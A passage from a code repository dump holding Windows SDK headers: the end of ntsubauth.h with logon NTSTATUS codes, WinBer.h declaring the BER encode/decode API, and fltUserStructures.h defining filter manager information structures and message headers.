358 | #define STATUS_ACCOUNT_RESTRICTION ((NTSTATUS)0xC000006EL)
359 | #define STATUS_INVALID_LOGON_HOURS ((NTSTATUS)0xC000006FL)
360 | #define STATUS_INVALID_WORKSTATION ((NTSTATUS)0xC0000070L)
361 | #define STATUS_PASSWORD_EXPIRED ((NTSTATUS)0xC0000071L)
362 | #define STATUS_ACCOUNT_DISABLED ((NTSTATUS)0xC0000072L)
363 | #define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009AL)
364 | #define STATUS_ACCOUNT_EXPIRED ((NTSTATUS)0xC0000193L)
365 | #define STATUS_PASSWORD_MUST_CHANGE ((NTSTATUS)0xC0000224L)
366 | #define STATUS_ACCOUNT_LOCKED_OUT ((NTSTATUS)0xC0000234L)
367 | #ifdef __cplusplus
368 | }
369 | #endif
370 |
371 | #endif /* _NTSUBAUTH_ */
372 |
373 |
374 |
--------------------------------------------------------------------------------
/inc/WinBer.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | Copyright (c) 1996-1999 Microsoft Corporation
4 |
5 | Module Name:
6 |
7 | winber.h Basic Encoding Rules (BER) API header file
8 |
9 | Abstract:
10 |
11 | This module is the header file for the 32 bit BER library on
12 | Windows NT and Windows 95.
13 |
14 | Updates :
15 |
16 | Environments :
17 |
18 | Win32 user mode
19 |
20 | --*/
21 |
22 | //
23 | // Only pull in this header file once.
24 | //
25 |
26 | #ifndef _WINBER_DEFINED_
27 | #define _WINBER_DEFINED_
28 |
29 | #if _MSC_VER > 1000
30 | #pragma once
31 | #endif
32 |
33 | #ifdef __cplusplus
34 | extern "C" {
35 | #endif
36 |
37 | #if !defined(_WINBER_)
38 | #define WINBERAPI DECLSPEC_IMPORT
39 | #else
40 | //#define WINBERAPI __declspec(dllexport)
41 | #define WINBERAPI
42 | #endif
43 |
44 | #ifndef BERAPI
45 | #define BERAPI __cdecl
46 | #endif
47 |
48 | #define LBER_ERROR 0xffffffffL
49 | #define LBER_DEFAULT 0xffffffffL
50 |
51 | typedef unsigned int ber_tag_t; /* for BER tags */
52 | typedef int ber_int_t; /* for BER ints, enums, and Booleans */
53 | typedef unsigned int ber_uint_t; /* unsigned equivalent of ber_int_t */
54 | typedef unsigned int ber_len_t; /* for BER octet strings and bit strings */
55 | typedef int ber_slen_t; /* signed equivalent of ber_len_t */
56 |
57 | //
58 | // This constructs a new BerElement structure containing a copy of the
59 | // data in the supplied berval structure.
60 | //
61 |
62 | WINBERAPI BerElement * BERAPI ber_init( BERVAL *pBerVal );
63 |
64 | //
65 | // This frees a BerElement which is returned from ber_alloc_t()
66 | // or ber_init(). The second argument - fbuf should always be set
67 | // to 1.
68 | //
69 | //
70 |
71 | WINBERAPI VOID BERAPI ber_free( BerElement *pBerElement, INT fbuf );
72 |
73 | //
74 | // Frees a BERVAL structure. Applications should not call
75 | // this API to free BERVAL structures which they themselves
76 | // have allocated
77 | //
78 |
79 | WINBERAPI VOID BERAPI ber_bvfree( BERVAL *pBerVal );
80 |
81 |
82 | //
83 | // Frees an array of BERVAL structures.
84 | //
85 |
86 | WINBERAPI VOID BERAPI ber_bvecfree( PBERVAL *pBerVal );
87 |
88 | //
89 | // Returns a copy of a the supplied berval structure
90 | //
91 |
92 | WINBERAPI BERVAL * BERAPI ber_bvdup( BERVAL *pBerVal );
93 |
94 |
95 | //
96 | // Constructs and returns a BerElement structure. The options field
97 | // contains a bitwise-or of options which are to be used when generating
98 | // the encoding of the BerElement
99 | //
100 | // The LBER_USE_DER options should always be specified.
101 | //
102 |
103 | WINBERAPI BerElement * BERAPI ber_alloc_t( INT options );
104 |
105 |
106 | //
107 | // This skips over the current tag and returns the tag of the next
108 | // element in the supplied BerElement. The lenght of this element is
109 | // stored in the pLen argument.
110 | //
111 | // LBER_DEFAULT is returned if there is no further data to be read
112 | // else the tag of the next element is returned.
113 | //
114 | // The difference between ber_skip_tag() and ber_peek_tag() is that the
115 | // state pointer is advanced past the first tag+lenght and is pointed to
116 | // the value part of the next element
117 | //
118 |
119 | WINBERAPI ULONG BERAPI ber_skip_tag( BerElement *pBerElement, ULONG *pLen );
120 |
121 | //
122 | // This returns the tag of the next element to be parsed in the
123 | // supplied BerElement. The length of this element is stored in the
124 | // pLen argument.
125 | //
126 | // LBER_DEFAULT is returned if there is no further data to be read
127 | // else the tag of the next element is returned.
128 | //
129 |
130 | WINBERAPI ULONG BERAPI ber_peek_tag( BerElement *pBerElement, ULONG *pLen);
131 |
132 | //
133 | // This returns the tag and length of the first element in a SET, SET OF
134 | // or SEQUENCE OF data value.
135 | //
136 | // LBER_DEFAULT is returned if the constructed value is empty else, the tag
137 | // is returned. It also returns an opaque cookie which has to be passed to
138 | // subsequent invocations of ber_next_element().
139 | //
140 |
141 | WINBERAPI ULONG BERAPI ber_first_element( BerElement *pBerElement, ULONG *pLen, __out CHAR **ppOpaque );
142 |
143 | //
144 | // This positions the state at the start of the next element in the
145 | // constructed type.
146 | //
147 | // LBER_DEFAULT is returned if the constructed value is empty else, the tag
148 | // is returned.
149 | //
150 |
151 | WINBERAPI ULONG BERAPI ber_next_element( BerElement *pBerElement, ULONG *pLen, __in CHAR *opaque );
152 |
153 | //
154 | // This allocates a BerVal structure whose contents are taken from the
155 | // supplied BerElement structure.
156 | //
157 | // The return values are 0 on success and -1 on error.
158 | //
159 |
160 | WINBERAPI INT BERAPI ber_flatten( BerElement *pBerElement, PBERVAL *pBerVal );
161 |
162 |
163 | /*
164 | The ber_printf() routine is used to encode a BER element in much the
165 | same way that sprintf() works. One important difference, though, is
166 | that state information is kept in the ber argument so that multiple
167 | calls can be made to ber_printf() to append to the end of the BER ele-
168 | ment. ber MUST be a pointer to a BerElement returned by ber_alloc_t().
169 | ber_printf() interprets and formats its arguments according to the for-
170 | mat string fmt. ber_printf() returns -1 if there is an error during
171 | encoding and a non-negative number if successful. As with sprintf(),
172 | each character in fmt refers to an argument to ber_printf().
173 |
174 | The format string can contain the following format characters:
175 |
176 | 't' Tag. The next argument is a ber_tag_t specifying the tag to
177 | override the next element to be written to the ber. This works
178 | across calls. The integer tag value SHOULD contain the tag
179 | class, constructed bit, and tag value. For example, a tag of
180 | "[3]" for a constructed type is 0xA3U. All implementations MUST
181 | support tags that fit in a single octet (i.e., where the tag
182 | value is less than 32) and they MAY support larger tags.
183 |
184 | 'b' Boolean. The next argument is an ber_int_t, containing either 0
185 | for FALSE or 0xff for TRUE. A boolean element is output. If
186 | this format character is not preceded by the 't' format modif-
187 | ier, the tag 0x01U is used for the element.
188 |
189 | 'e' Enumerated. The next argument is a ber_int_t, containing the
190 | enumerated value in the host's byte order. An enumerated ele-
191 | ment is output. If this format character is not preceded by the
192 | 't' format modifier, the tag 0x0AU is used for the element.
193 |
194 | 'i' Integer. The next argument is a ber_int_t, containing the
195 | integer in the host's byte order. An integer element is output.
196 | If this format character is not preceded by the 't' format
197 | modifier, the tag 0x02U is used for the element.
198 |
199 | 'n' Null. No argument is needed. An ASN.1 NULL element is output.
200 | If this format character is not preceded by the 't' format
201 | modifier, the tag 0x05U is used for the element.
202 |
203 | 'o' Octet string. The next two arguments are a char *, followed by
204 | a ber_len_t with the length of the string. The string MAY con-
205 | tain null bytes and are do not have to be zero-terminated. An
206 | octet string element is output, in primitive form. If this for-
207 | mat character is not preceded by the 't' format modifier, the
208 | tag 0x04U is used for the element.
209 |
210 | 's' Octet string. The next argument is a char * pointing to a
211 | zero-terminated string. An octet string element in primitive
212 | form is output, which does not include the trailing '\0' (null)
213 | byte. If this format character is not preceded by the 't' format
214 | modifier, the tag 0x04U is used for the element.
215 |
216 | 'v' Several octet strings. The next argument is a char **, an array
217 | of char * pointers to zero-terminated strings. The last element
218 | in the array MUST be a NULL pointer. The octet strings do not
219 | include the trailing '\0' (null) byte. Note that a construct
220 | like '{v}' is used to get an actual SEQUENCE OF octet strings.
221 | The 't' format modifier cannot be used with this format charac-
222 | ter.
223 |
224 | 'V' Several octet strings. A NULL-terminated array of struct berval
225 | *'s is supplied. Note that a construct like '{V}' is used to
226 | get an actual SEQUENCE OF octet strings. The 't' format modifier
227 | cannot be used with this format character.
228 |
229 | '{' Begin sequence. No argument is needed. If this format charac-
230 | ter is not preceded by the 't' format modifier, the tag 0x30U is
231 | used.
232 |
233 | '}' End sequence. No argument is needed. The 't' format modifier
234 | cannot be used with this format character.
235 |
236 | '[' Begin set. No argument is needed. If this format character is
237 | not preceded by the 't' format modifier, the tag 0x31U is used.
238 |
239 | ']' End set. No argument is needed. The 't' format modifier cannot
240 | be used with this format character.
241 | */
242 |
243 | WINBERAPI INT BERAPI ber_printf( BerElement *pBerElement, __in PCHAR fmt, ... );
244 |
245 | /*
246 | The ber_scanf() routine is used to decode a BER element in much the same
247 | way that sscanf() works. One important difference, though, is that some
248 | state information is kept with the ber argument so that multiple calls
249 | can be made to ber_scanf() to sequentially read from the BER element.
250 | The ber argument SHOULD be a pointer to a BerElement returned by
251 | ber_init(). ber_scanf interprets the bytes according to the format
252 | string fmt, and stores the results in its additional arguments.
253 | ber_scanf() returns LBER_ERROR on error, and a different value on suc-
254 | cess.
255 |
256 | The format string contains conversion specifications which are used to
257 | direct the interpretation of the BER element. The format string can
258 | contain the following characters:
259 |
260 | 'a' Octet string. A char ** argument MUST be supplied. Memory is
261 | allocated, filled with the contents of the octet string, zero-
262 | terminated, and the pointer to the string is stored in the argu-
263 | ment. The returned value SHOULD be freed using ldap_memfree.
264 | The tag of the element MUST indicate the primitive form
265 | (constructed strings are not supported) but is otherwise ignored
266 | and discarded during the decoding. This format cannot be used
267 | with octet strings which could contain null bytes.
268 |
269 | 'O' Octet string. A struct berval ** argument MUST be supplied,
270 | which upon return points to an allocated struct berval contain-
271 | ing the octet string and its length. ber_bvfree() SHOULD be
272 | called to free the allocated memory. The tag of the element
273 | MUST indicate the primitive form (constructed strings are not
274 | supported) but is otherwise ignored during the decoding.
275 |
276 | 'b' Boolean. A pointer to a ber_int_t MUST be supplied. The
277 | ber_int_t value stored will be 0 for FALSE or nonzero for TRUE.
278 | The tag of the element MUST indicate the primitive form but is
279 | otherwise ignored during the decoding.
280 |
281 | 'e' Enumerated. A pointer to a ber_int_t MUST be supplied. The
282 | enumerated value stored will be in host byte order. The tag of
283 | the element MUST indicate the primitive form but is otherwise
284 | ignored during the decoding. ber_scanf() will return an error
285 | if the value of the enumerated value cannot be stored in a
286 | ber_int_t.
287 |
288 | 'i' Integer. A pointer to a ber_int_t MUST be supplied. The
289 | ber_int_t value stored will be in host byte order. The tag of
290 | the element MUST indicate the primitive form but is otherwise
291 | ignored during the decoding. ber_scanf() will return an error
292 | if the integer cannot be stored in a ber_int_t.
293 |
294 | 'B' Bitstring. A char ** argument MUST be supplied which will point
295 | to the allocated bits, followed by a ber_len_t * argument, which
296 | will point to the length (in bits) of the bitstring returned.
297 | ldap_memfree SHOULD be called to free the bitstring. The tag of
298 | the element MUST indicate the primitive form (constructed bit-
299 | strings are not supported) but is otherwise ignored during the
300 | decoding.
301 |
302 | 'n' Null. No argument is needed. The element is verified to have a
303 | zero-length value and is skipped. The tag is ignored.
304 |
305 | 'v' Several octet strings. A char *** argument MUST be supplied,
306 | which upon return points to an allocated NULL-terminated array
307 | of char *'s containing the octet strings. NULL is stored if the
308 | sequence is empty. ldap_memfree SHOULD be called to free each
309 | element of the array and the array itself. The tag of the
310 | sequence and of the octet strings are ignored.
311 |
312 | 'V' Several octet strings (which could contain null bytes). A
313 | struct berval *** MUST be supplied, which upon return points to
314 | a allocated NULL-terminated array of struct berval *'s contain-
315 | ing the octet strings and their lengths. NULL is stored if the
316 | sequence is empty. ber_bvecfree() can be called to free the
317 | allocated memory. The tag of the sequence and of the octet
318 | strings are ignored.
319 |
320 | 'x' Skip element. The next element is skipped. No argument is
321 | needed.
322 |
323 | '{' Begin sequence. No argument is needed. The initial sequence
324 | tag and length are skipped.
325 |
326 | '}' End sequence. No argument is needed.
327 |
328 | '[' Begin set. No argument is needed. The initial set tag and
329 | length are skipped.
330 |
331 | ']' End set. No argument is needed.
332 |
333 | */
334 |
335 | WINBERAPI ULONG BERAPI ber_scanf( BerElement *pBerElement, __in PCHAR fmt, ... );
336 |
337 |
338 | #ifdef __cplusplus
339 | }
340 | #endif
341 |
342 |
343 | #endif // _WINBER_DEFINED_
344 |
345 |
--------------------------------------------------------------------------------
/inc/fltUserStructures.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | Copyright (c) 1989-2002 Microsoft Corporation
4 |
5 | Module Name:
6 |
7 | fltUserStructures.h
8 |
9 | Abstract:
10 |
11 | This contains structures, types, and defintiions that are common to both
12 | USER mode and KERNEL mode environments.
13 |
14 | Environment:
15 |
16 | User mode
17 |
18 | --*/
19 | #ifndef __FLT_USER_STRUCTURES_H__
20 | #define __FLT_USER_STRUCTURES_H__
21 |
22 | #if FLT_MGR_BASELINE
23 |
24 | //
25 | // Disable warning for this file
26 | //
27 |
28 | #define FLTAPI NTAPI
29 |
30 | #define FILTER_NAME_MAX_CHARS 255
31 | #define FILTER_NAME_MAX_BYTES (FILTER_NAME_MAX_CHARS * sizeof( WCHAR ))
32 |
33 | #define VOLUME_NAME_MAX_CHARS 1024
34 | #define VOLUME_NAME_MAX_BYTES (VOLUME_NAME_MAX_CHARS * sizeof( WCHAR ))
35 |
36 | #define INSTANCE_NAME_MAX_CHARS 255
37 | #define INSTANCE_NAME_MAX_BYTES (INSTANCE_NAME_MAX_CHARS * sizeof( WCHAR ))
38 |
39 | typedef HANDLE HFILTER;
40 | typedef HANDLE HFILTER_INSTANCE;
41 | typedef HANDLE HFILTER_VOLUME;
42 |
43 |
44 | //
45 | // Note: this may be removed in future when all translations from NTSTATUS to
46 | // Win32 error codes are checked in. This is interim - since there the
47 | // translation is not in for all filter manager error codes,
48 | // apps will have to access NTSTATUS codes directly
49 | //
50 |
51 | typedef __success(return >= 0) LONG NTSTATUS;
52 | typedef NTSTATUS *PNTSTATUS;
53 |
54 | ///////////////////////////////////////////////////////////////////////////////
55 | //
56 | // Known File System Types
57 | //
58 | ///////////////////////////////////////////////////////////////////////////////
59 |
60 | typedef enum _FLT_FILESYSTEM_TYPE {
61 |
62 | FLT_FSTYPE_UNKNOWN, //an UNKNOWN file system type
63 | FLT_FSTYPE_RAW, //Microsoft's RAW file system (\FileSystem\RAW)
64 | FLT_FSTYPE_NTFS, //Microsoft's NTFS file system (\FileSystem\Ntfs)
65 | FLT_FSTYPE_FAT, //Microsoft's FAT file system (\FileSystem\Fastfat)
66 | FLT_FSTYPE_CDFS, //Microsoft's CDFS file system (\FileSystem\Cdfs)
67 | FLT_FSTYPE_UDFS, //Microsoft's UDFS file system (\FileSystem\Udfs)
68 | FLT_FSTYPE_LANMAN, //Microsoft's LanMan Redirector (\FileSystem\MRxSmb)
69 | FLT_FSTYPE_WEBDAV, //Microsoft's WebDav redirector (\FileSystem\MRxDav)
70 | FLT_FSTYPE_RDPDR, //Microsoft's Terminal Server redirector (\Driver\rdpdr)
71 | FLT_FSTYPE_NFS, //Microsoft's NFS file system (\FileSystem\NfsRdr)
72 | FLT_FSTYPE_MS_NETWARE, //Microsoft's NetWare redirector (\FileSystem\nwrdr)
73 | FLT_FSTYPE_NETWARE, //Novell's NetWare redirector
74 | FLT_FSTYPE_BSUDF, //The BsUDF CD-ROM driver (\FileSystem\BsUDF)
75 | FLT_FSTYPE_MUP, //Microsoft's Mup redirector (\FileSystem\Mup)
76 | FLT_FSTYPE_RSFX, //Microsoft's WinFS redirector (\FileSystem\RsFxDrv)
77 | FLT_FSTYPE_ROXIO_UDF1, //Roxio's UDF writeable file system (\FileSystem\cdudf_xp)
78 | FLT_FSTYPE_ROXIO_UDF2, //Roxio's UDF readable file system (\FileSystem\UdfReadr_xp)
79 | FLT_FSTYPE_ROXIO_UDF3, //Roxio's DVD file system (\FileSystem\DVDVRRdr_xp)
80 | FLT_FSTYPE_TACIT, //Tacit FileSystem (\Device\TCFSPSE)
81 | FLT_FSTYPE_FS_REC, //Microsoft's File system recognizer (\FileSystem\Fs_rec)
82 | FLT_FSTYPE_INCD, //Nero's InCD file system (\FileSystem\InCDfs)
83 | FLT_FSTYPE_INCD_FAT, //Nero's InCD FAT file system (\FileSystem\InCDFat)
84 | FLT_FSTYPE_EXFAT, //Microsoft's EXFat FILE SYSTEM (\FileSystem\exfat)
85 | FLT_FSTYPE_PSFS, //PolyServ's file system (\FileSystem\psfs)
86 | FLT_FSTYPE_GPFS //IBM General Parallel File System (\FileSystem\gpfs)
87 |
88 | } FLT_FILESYSTEM_TYPE, *PFLT_FILESYSTEM_TYPE;
89 |
90 |
91 | /////////////////////////////////////////////////////////////////////////////
92 | //
93 | // The different types information that can be return on an Filter.
94 | //
95 | // Note: Entries with "Aggregate" in the name return information for
96 | // both LEGACY and MINI filters.
97 | //
98 | /////////////////////////////////////////////////////////////////////////////
99 |
100 |
101 | //
102 | // In xpsp2 we do not have the concept of enumerating legacy filters
103 | // For this reason there is no FilterAggregateBasicInfo in the V1 version
104 | // of the enum
105 | //
106 |
107 | typedef enum _FILTER_INFORMATION_CLASS {
108 |
109 | FilterFullInformation,
110 | FilterAggregateBasicInformation, //Added to XP SP2 via QFE
111 | FilterAggregateStandardInformation //Longhorn and later
112 |
113 | } FILTER_INFORMATION_CLASS, *PFILTER_INFORMATION_CLASS;
114 |
115 | //
116 | // The structures for the information returned from the query of
117 | // information on a Filter.
118 | //
119 |
120 | typedef struct _FILTER_FULL_INFORMATION {
121 |
122 | ULONG NextEntryOffset;
123 |
124 | ULONG FrameID;
125 |
126 | ULONG NumberOfInstances;
127 |
128 | USHORT FilterNameLength;
129 | WCHAR FilterNameBuffer[1];
130 |
131 | } FILTER_FULL_INFORMATION, *PFILTER_FULL_INFORMATION;
132 |
133 |
134 | //
135 | // This structure returns information for both legacy filters and mini
136 | // filters.
137 | //
138 | // NOTE: Support for this structures exists in all OS's that support
139 | // filter manager except XP SP2. It was added later to XP SP2
140 | // via a QFE.
141 | //
142 |
143 | typedef struct _FILTER_AGGREGATE_BASIC_INFORMATION {
144 |
145 | ULONG NextEntryOffset;
146 |
147 | //
148 | // ABI - Aggregate Basic Information flags
149 | //
150 |
151 | ULONG Flags;
152 | #define FLTFL_AGGREGATE_INFO_IS_MINIFILTER 0x00000001
153 | #define FLTFL_AGGREGATE_INFO_IS_LEGACYFILTER 0x00000002
154 |
155 | union {
156 |
157 | //
158 | // Minifilter FULL information
159 | //
160 |
161 | struct {
162 |
163 | ULONG FrameID;
164 |
165 | ULONG NumberOfInstances;
166 |
167 | USHORT FilterNameLength;
168 | USHORT FilterNameBufferOffset;
169 |
170 | USHORT FilterAltitudeLength;
171 | USHORT FilterAltitudeBufferOffset;
172 |
173 | } MiniFilter;
174 |
175 | //
176 | // Legacyfilter information
177 | //
178 |
179 | struct {
180 |
181 | USHORT FilterNameLength;
182 | USHORT FilterNameBufferOffset;
183 |
184 | } LegacyFilter;
185 |
186 | } Type;
187 |
188 | } FILTER_AGGREGATE_BASIC_INFORMATION, *PFILTER_AGGREGATE_BASIC_INFORMATION;
189 |
190 |
191 | //
192 | // This structure returns information for both legacy filters and mini
193 | // filters.
194 | //
195 | // NOTE: Support for this structures exists in Vista and Later
196 | //
197 |
198 | #if FLT_MGR_LONGHORN
199 | typedef struct _FILTER_AGGREGATE_STANDARD_INFORMATION {
200 |
201 | ULONG NextEntryOffset;
202 |
203 | //
204 | // ASI - Aggregate Standard Information flags
205 | //
206 |
207 | ULONG Flags;
208 | #define FLTFL_ASI_IS_MINIFILTER 0x00000001
209 | #define FLTFL_ASI_IS_LEGACYFILTER 0x00000002
210 |
211 | union {
212 |
213 | //
214 | // Minifilter FULL information
215 | //
216 |
217 | struct {
218 |
219 | //
220 | // ASIM - Aggregate Standard Information Minifilter flags
221 | //
222 |
223 | ULONG Flags;
224 |
225 |
226 | ULONG FrameID;
227 |
228 | ULONG NumberOfInstances;
229 |
230 | USHORT FilterNameLength;
231 | USHORT FilterNameBufferOffset;
232 |
233 | USHORT FilterAltitudeLength;
234 | USHORT FilterAltitudeBufferOffset;
235 |
236 | } MiniFilter;
237 |
238 | //
239 | // Legacyfilter information
240 | //
241 |
242 | struct {
243 |
244 | //
245 | // ASIL - Aggregate Standard Information LegacyFilter flags
246 | //
247 |
248 | ULONG Flags;
249 |
250 |
251 | USHORT FilterNameLength;
252 | USHORT FilterNameBufferOffset;
253 |
254 | USHORT FilterAltitudeLength;
255 | USHORT FilterAltitudeBufferOffset;
256 |
257 | } LegacyFilter;
258 |
259 | } Type;
260 |
261 | } FILTER_AGGREGATE_STANDARD_INFORMATION, *PFILTER_AGGREGATE_STANDARD_INFORMATION;
262 | #endif // FLT_MGR_LONGHORN
263 |
264 |
265 | /////////////////////////////////////////////////////////////////////////////
266 | //
267 | // The different types information that can be return for a Volume
268 | //
269 | /////////////////////////////////////////////////////////////////////////////
270 |
271 | typedef enum _FILTER_VOLUME_INFORMATION_CLASS {
272 |
273 | FilterVolumeBasicInformation,
274 | FilterVolumeStandardInformation //Longhorn and later
275 |
276 | } FILTER_VOLUME_INFORMATION_CLASS, *PFILTER_VOLUME_INFORMATION_CLASS;
277 |
278 |
279 | //
280 | // Basic information about a volume (its name)
281 | //
282 |
283 | typedef struct _FILTER_VOLUME_BASIC_INFORMATION {
284 |
285 | //
286 | // Length of name
287 | //
288 |
289 | USHORT FilterVolumeNameLength;
290 |
291 | //
292 | // Buffer containing name (it's NOT NULL-terminated)
293 | //
294 |
295 | WCHAR FilterVolumeName[1];
296 |
297 | } FILTER_VOLUME_BASIC_INFORMATION, *PFILTER_VOLUME_BASIC_INFORMATION;
298 |
299 | //
300 | // Additional volume information.
301 | //
302 | // NOTE: Only available in LONGHORN and later OS's
303 | //
304 |
305 | #if FLT_MGR_LONGHORN
306 | typedef struct _FILTER_VOLUME_STANDARD_INFORMATION {
307 |
308 | ULONG NextEntryOffset;
309 |
310 | //
311 | // VSI - VOlume Standard Information flags
312 | //
313 |
314 | ULONG Flags;
315 |
316 | //
317 | // If set this volume is not current attached to a storage stack
318 | //
319 |
320 | #define FLTFL_VSI_DETACHED_VOLUME 0x00000001
321 |
322 | //
323 | // Identifies which frame this volume structure is in
324 | //
325 |
326 | ULONG FrameID;
327 |
328 | //
329 | // Identifies the type of file system being used on the volume
330 | //
331 |
332 | FLT_FILESYSTEM_TYPE FileSystemType;
333 |
334 | //
335 | // Length of name
336 | //
337 |
338 | USHORT FilterVolumeNameLength;
339 |
340 | //
341 | // Buffer containing name (it's NOT NULL-terminated)
342 | //
343 |
344 | WCHAR FilterVolumeName[1];
345 |
346 | } FILTER_VOLUME_STANDARD_INFORMATION, *PFILTER_VOLUME_STANDARD_INFORMATION;
347 | #endif // FLT_MGR_LONGHORN
348 |
349 |
350 |
351 | /////////////////////////////////////////////////////////////////////////////
352 | //
353 | // The different types information that can be return on an Instance.
354 | //
355 | /////////////////////////////////////////////////////////////////////////////
356 |
357 | typedef enum _INSTANCE_INFORMATION_CLASS {
358 |
359 | InstanceBasicInformation,
360 | InstancePartialInformation,
361 | InstanceFullInformation,
362 | InstanceAggregateStandardInformation //LONGHORN and later
363 |
364 | } INSTANCE_INFORMATION_CLASS, *PINSTANCE_INFORMATION_CLASS;
365 |
366 |
367 | //
368 | // The structures for the information returned from the query of the information
369 | // on the Instance.
370 | //
371 |
372 | typedef __struct_bcount(sizeof(INSTANCE_BASIC_INFORMATION) * InstanceNameLength) struct _INSTANCE_BASIC_INFORMATION {
373 |
374 | ULONG NextEntryOffset;
375 |
376 | USHORT InstanceNameLength;
377 | USHORT InstanceNameBufferOffset;
378 |
379 | } INSTANCE_BASIC_INFORMATION, *PINSTANCE_BASIC_INFORMATION;
380 |
381 | typedef __struct_bcount(sizeof(INSTANCE_PARTIAL_INFORMATION) + InstanceNameLength + AltitudeLength) struct _INSTANCE_PARTIAL_INFORMATION {
382 |
383 | ULONG NextEntryOffset;
384 |
385 | USHORT InstanceNameLength;
386 | USHORT InstanceNameBufferOffset;
387 |
388 | USHORT AltitudeLength;
389 | USHORT AltitudeBufferOffset;
390 |
391 | } INSTANCE_PARTIAL_INFORMATION, *PINSTANCE_PARTIAL_INFORMATION;
392 |
393 | typedef __struct_bcount(sizeof(INSTANCE_FULL_INFORMATION) + InstanceNameLength + AltitudeLength + VolumeNameLength + FilterNameLength) struct _INSTANCE_FULL_INFORMATION {
394 |
395 | ULONG NextEntryOffset;
396 |
397 | USHORT InstanceNameLength;
398 | USHORT InstanceNameBufferOffset;
399 |
400 | USHORT AltitudeLength;
401 | USHORT AltitudeBufferOffset;
402 |
403 | USHORT VolumeNameLength;
404 | USHORT VolumeNameBufferOffset;
405 |
406 | USHORT FilterNameLength;
407 | USHORT FilterNameBufferOffset;
408 |
409 | } INSTANCE_FULL_INFORMATION, *PINSTANCE_FULL_INFORMATION;
410 |
411 |
412 | //
413 | // This information class is used to return instance information about both
414 | // legacy filters and minifilters.
415 | //
416 |
417 | #if FLT_MGR_LONGHORN
418 | typedef struct _INSTANCE_AGGREGATE_STANDARD_INFORMATION {
419 |
420 | ULONG NextEntryOffset;
421 |
422 | //
423 | // IASI - Instance Aggregate Standard Information flags
424 | //
425 |
426 | ULONG Flags;
427 | #define FLTFL_IASI_IS_MINIFILTER 0x00000001
428 | #define FLTFL_IASI_IS_LEGACYFILTER 0x00000002
429 |
430 | union {
431 |
432 | //
433 | // MiniFilter information
434 | //
435 |
436 | struct {
437 |
438 | //
439 | // IASIM - Instance Aggregate Standard Information Minifilter flags
440 | //
441 |
442 | ULONG Flags;
443 |
444 | //
445 | // If set this volume is not current attached to a storage stack
446 | //
447 |
448 | #define FLTFL_IASIM_DETACHED_VOLUME 0x00000001
449 |
450 | //
451 | // Identifies which frame this volume structure is in
452 | //
453 |
454 | ULONG FrameID;
455 |
456 | //
457 | // The type of file system this instance is attached to
458 | //
459 |
460 | FLT_FILESYSTEM_TYPE VolumeFileSystemType;
461 |
462 | //
463 | // The name of this instance
464 | //
465 |
466 | USHORT InstanceNameLength;
467 | USHORT InstanceNameBufferOffset;
468 |
469 | //
470 | // The altitude of this instance
471 | //
472 |
473 | USHORT AltitudeLength;
474 | USHORT AltitudeBufferOffset;
475 |
476 | //
477 | // The volume name this instance is attached to
478 | //
479 |
480 | USHORT VolumeNameLength;
481 | USHORT VolumeNameBufferOffset;
482 |
483 | //
484 | // The name of the minifilter associated with this instace
485 | //
486 |
487 | USHORT FilterNameLength;
488 | USHORT FilterNameBufferOffset;
489 |
490 | } MiniFilter;
491 |
492 | //
493 | // Legacyfilter information
494 | //
495 |
496 | struct {
497 |
498 | //
499 | // IASIL - Instance Aggregate Standard Information LegacyFilter flags
500 | //
501 |
502 | ULONG Flags;
503 |
504 | //
505 | // If set this volume is not current attached to a storage stack
506 | //
507 |
508 | #define FLTFL_IASIL_DETACHED_VOLUME 0x00000001
509 |
510 | //
511 | // The altitude of this attachment
512 | //
513 |
514 | USHORT AltitudeLength;
515 | USHORT AltitudeBufferOffset;
516 |
517 | //
518 | // The volume name this filter is attached to
519 | //
520 |
521 | USHORT VolumeNameLength;
522 | USHORT VolumeNameBufferOffset;
523 |
524 | //
525 | // The name of the filter associated with this attachment
526 | //
527 |
528 | USHORT FilterNameLength;
529 | USHORT FilterNameBufferOffset;
530 |
531 | } LegacyFilter;
532 |
533 | } Type;
534 |
535 | } INSTANCE_AGGREGATE_STANDARD_INFORMATION, *PINSTANCE_AGGREGATE_STANDARD_INFORMATION;
536 | #endif // FLT_MGR_LONGHORN
537 |
538 |
539 | /////////////////////////////////////////////////////////////////////////////
540 | //
541 | // Message defintitions
542 | //
543 | /////////////////////////////////////////////////////////////////////////////
544 |
545 | typedef struct _FILTER_MESSAGE_HEADER {
546 |
547 | //
548 | // OUT
549 | //
550 | // Total buffer length in bytes, including the FILTER_REPLY_HEADER, of
551 | // the expected reply. If no reply is expected, 0 is returned.
552 | //
553 |
554 | ULONG ReplyLength;
555 |
556 | //
557 | // OUT
558 | //
559 | // Unique Id for this message. This will be set when the kernel message
560 | // satifies this FilterGetMessage or FilterInstanceGetMessage request.
561 | // If replying to this message, this is the MessageId that should be used.
562 | //
563 |
564 | ULONGLONG MessageId;
565 |
566 | //
567 | // General filter-specific buffer data follows...
568 | //
569 |
570 | } FILTER_MESSAGE_HEADER, *PFILTER_MESSAGE_HEADER;
571 |
572 | typedef struct _FILTER_REPLY_HEADER {
573 |
574 | //
575 | // IN.
576 | //
577 | // Status of this reply. This status will be returned back to the filter
578 | // driver who is waiting for a reply.
579 | //
580 |
581 | NTSTATUS Status;
582 |
583 | //
584 | // IN
585 | //
586 | // Unique Id for this message. This id was returned in the
587 | // FILTER_MESSAGE_HEADER from the kernel message to which we are replying.
588 | //
589 |
590 | ULONGLONG MessageId;
591 |
592 | //
593 | // General filter-specific buffer data follows...
594 | //
595 |
596 | } FILTER_REPLY_HEADER, *PFILTER_REPLY_HEADER;
597 |
598 | #endif //FLT_MGR_BASELINE
599 |
600 | #endif /* __FLT_USER_STRUCTURES_H__ */
601 |
602 |
--------------------------------------------------------------------------------